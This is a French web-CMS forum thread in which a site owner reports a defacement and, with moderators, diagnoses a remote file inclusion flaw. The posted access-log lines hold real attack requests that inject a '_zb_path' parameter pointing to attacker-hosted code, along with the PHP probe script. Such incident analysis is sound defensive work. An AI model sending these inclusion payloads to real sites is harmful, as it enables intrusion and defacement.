[info]Site apparemment hacké
Frenchbulldog Membre non connecté
-
Booster Mortier
- Voir le profil du membre Frenchbulldog
- Inscrit le : 20/11/2008
- Site internet
Juste pour information, Bulldogdesign à apparemment été hacké, j'ai pas trop de dégat, juste le titre changé.
Je précise que je n'avais pas fait de mise à jour depuis la première 3.0.
J'ai pas le temps de m'occuper de la mise à jour, je vais mettre un htacess pour bloquer le site.
Petite précision, j'ai pas mal de module perso, ce qui à probablement facilité la tâche au hacker.
Bonne soirée.
Ptithom Membre non connecté
-
Modérateur
- Voir le profil du membre Ptithom
- Inscrit le : 07/11/2006
- Site internet
- Groupes :
-
Equipe Historique
Gsgsd Membre non connecté
-
Booster Fusée
- Voir le profil du membre Gsgsd
- Inscrit le : 07/12/2007
- Site internet
Frenchbulldog Membre non connecté
-
Booster Mortier
- Voir le profil du membre Frenchbulldog
- Inscrit le : 20/11/2008
- Site internet
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Si éventuellement il y a une faille, il faut qu'on sâche par où l'attaquant est passé.
Frenchbulldog Membre non connecté
-
Booster Mortier
- Voir le profil du membre Frenchbulldog
- Inscrit le : 20/11/2008
- Site internet
http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?
Code PHP :
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Extrait du fichier log :
Code PHP :
70.38.64.117 - - [28/Nov/2009:20:54:41 +0100] "GET /telechargement/%20%20///////////////?_zb_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 302 234 www.bulldogdesign.fr "-" "Mozilla/5.0" "-" 70.38.64.117 - - [28/Nov/2009:20:54:41 +0100] "GET /telechargement///////////////?_zb_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 302 5 www.bulldogdesign.fr "-" "Mozilla/5.0" "-" 70.38.64.117 - - [28/Nov/2009:20:54:41 +0100] "GET ///////////////?_zb_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 302 5 www.bulldogdesign.fr "-" "Mozilla/5.0" "-" 70.38.64.117 - - [28/Nov/2009:20:54:41 +0100] "GET /telechargement///////////////telechargement.php HTTP/1.1" 200 9022 www.bulldogdesign.fr "-" "Mozilla/5.0" "-" 70.38.64.117 - - [28/Nov/2009:20:54:42 +0100] "GET /news/news.php HTTP/1.1" 200 12192 www.bulldogdesign.fr "-" "Mozilla/5.0" "-" 70.38.64.117 - - [28/Nov/2009:20:54:44 +0100] "GET /member/404.php HTTP/1.1" 404 9182 www.bulldogdesign.fr "-" "Mozilla/5.0" "-" 66.249.71.103 - - [28/Nov/2009:20:55:08 +0100] "GET /stats/stats-pages.php?d=4&m=3&y=2096 HTTP/1.1" 200 14196 www.bulldogdesign.fr "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" 66.249.71.103 - - [28/Nov/2009:20:57:28 +0100] "GET /stats/stats-pages.php?d=14&m=10&y=2204 HTTP/1.1" 200 14207 www.bulldogdesign.fr "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" 66.249.71.103 - - [28/Nov/2009:21:00:27 +0100] "GET /stats/stats-pages.php?d=5&m=10&y=2193 HTTP/1.1" 200 14202 www.bulldogdesign.fr "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" 66.249.71.103 - - [28/Nov/2009:21:01:48 +0100] "GET /stats/stats-pages.php?d=15&m=4&y=2105 HTTP/1.1" 200 14170 www.bulldogdesign.fr "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" 70.38.64.117 - - [28/Nov/2009:21:03:43 +0100] "GET /forum/%20%20///////////////?_zb_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 302 234 www.bulldogdesign.fr "-" "Mozilla/5.0" "-" 70.38.64.117 - - [28/Nov/2009:21:03:43 +0100] "GET /member/404.php HTTP/1.1" 404 9181 www.bulldogdesign.fr "-" "Mozilla/5.0" "-" 70.38.64.117 - - [28/Nov/2009:21:03:44 +0100] "GET /forum///////////////?_zb_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? HTTP/1.1" 200 20468 www.bulldogdesign.fr "-" "Mozilla/5.0" "-"
Je vais revérifier mon module.
Édité par Frenchbulldog Le 29/11/2009 à 20h54
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
N'oublie jamais un truc : il ne faut jamais faire confiance à ce que l'utilisateur t'envoie comme variables.
CrowkaiT Membre non connecté
-
Modérateur
- Voir le profil du membre CrowkaiT
- Inscrit le : 17/06/2005
- Site internet
- Groupes :
-
Equipe Historique
A première vue, tu as été victime d'une faille d'include, il faut bien faire attention à ça, c'est une des erreurs les plus courantes.
Frenchbulldog Membre non connecté
-
Booster Mortier
- Voir le profil du membre Frenchbulldog
- Inscrit le : 20/11/2008
- Site internet
CrowkaiT :
Pourrais-tu nous envoyer ton module pour voir quelle faille il a utilisé ?
A première vue, tu as été victime d'une faille d'include, il faut bien faire attention à ça, c'est une des erreurs les plus courantes.
A première vue, tu as été victime d'une faille d'include, il faut bien faire attention à ça, c'est une des erreurs les plus courantes.
Je vais regarder pour te le passer dès que j'ai un moment.
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie